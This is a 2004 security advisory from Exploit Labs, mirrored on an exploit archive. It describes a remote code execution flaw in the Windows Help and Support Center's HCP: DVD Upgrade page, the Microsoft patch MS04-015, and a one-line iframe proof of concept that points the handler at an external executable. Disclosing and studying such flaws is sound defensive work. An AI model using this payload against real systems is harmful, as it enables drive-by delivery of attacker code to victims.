exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Exploit Labs Security Advisory 2003.27

Exploit Labs Security Advisory 2003.27
Posted May 12, 2004
Authored by Donnie Werner, Exploit Labs | Site exploitlabs.com

Exploitlabs.com Advisory 27 - Microsoft Windows Help and Support Center has a vulnerability due to an unspecified input validation error. This can be exploited via the HCP protocol on Microsoft Windows XP and Microsoft Windows 2003 through Internet Explorer or Outlook and allows for arbitrary code execution.

tags | advisory, arbitrary, code execution, protocol
systems | windows
SHA-256 | d988b8210aca1e91cb4d3d9dd5b3f573ea60e02d6175fb32fad685eae2dc0074

Exploit Labs Security Advisory 2003.27

Change Mirror Download
------------------------------------------------------------
- EXPL-A-2003-027 exploitlabs.com Advisory 027 -
------------------------------------------------------------
- Windows Help Center - Dvdupgrade -



OVERVIEW
========
"Help and Support Center (HSC) is a feature in Windows that provides
help on a variety of topics" It can also be accessed via HCP: URLs.
HSC is installed by default on Windows XP and Windows Server 2003 systems.

An input invalidation vulnerability in HSC allows exposes users to
a remote code execution vulnerability that allows an attacker to run
arbitrary code when the victim opens a specially formatted HCP: URL.
The user may be automatically directed to such URL when a web page is
viewed. The issue can also be exploited via e-mail.


AFFECTED PRODUCTS
=================
Microsoft Windows Operating Systems with Help and Support Center

Microsoft Windows XP and Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerT 2003
Microsoft Windows Server 2003


items: "%windir%\PCHealth\HelpCtr\Binaries\HelpCtr.exe
%windir%\PCHEALTH\HELPCTR\System\DVDUpgrd.htm
%windir%\PCHEALTH\HELPCTR\System\DVDUpgrd.js


DETAILS
=======
The HSC installation contains various HTML and javascript files,which
are intended to be used by HSC's internal use. The HTML files belong
in the My Computer Zone because they require e.g. the ability to
launch external helper programs with JavaScript.

By using a specialy crafted url an attacker can cause the users local
machine to start and render helpctr.exe in the local context and passes
the injected url to the application. The user is then presented with the
Help and Support DvD Upgrade dialog in Help and Support Center.

With the Dvdupgrade page, The injected url is now linked to the "upgrade
now" button. By pressing the updrade now button, the user is presented
with a (open) / (save) dialog box with the offending ( attackers ) file.


This allows an attacker to initiate the Dvdupgrade action on HSC,
inject JavaScript code which will be run in the context of these HTML
files, speciffically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this
way the attacker can run scripts in the My Computer Zone, which can
e.g. download an start an attacker-supplied EXE program.

As an aside, no url activity is displayed and there is no address or status
bar for Help and Support.



SOLUTION
========
Microsoft was contacted on March 18th, 2004. A patch has been
produced to correct the vulnerability. They have issued the
following:

Microsoft Security Bulletin MS04-015
Vulnerability in Help and Support Center Could Allow Remote Code Execution
(840374)
Issued: May 11, 2004
Version: 1.0
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Important
Recommendation: Customers should install the update at the earliest
opportunity.

Information about the vunerability and the patch can be found at

http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx



PROOF OF CONCEPT
================
<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc
/dvd
upgd/dvdupgd.exe"
width="1" height="1">
</iframe>



http://exploitlabs.com/msnspoof/poc/
http://exploitlabs.com/msnspoof/poc/index2.html

http://exploitlabs.com/msnspoof/poc/index3.jpg



CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner
Information Security Specialist
security@exploitlabs.com
--
Web: http://exploitlabs.com
Ph: (360)-312-8011
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close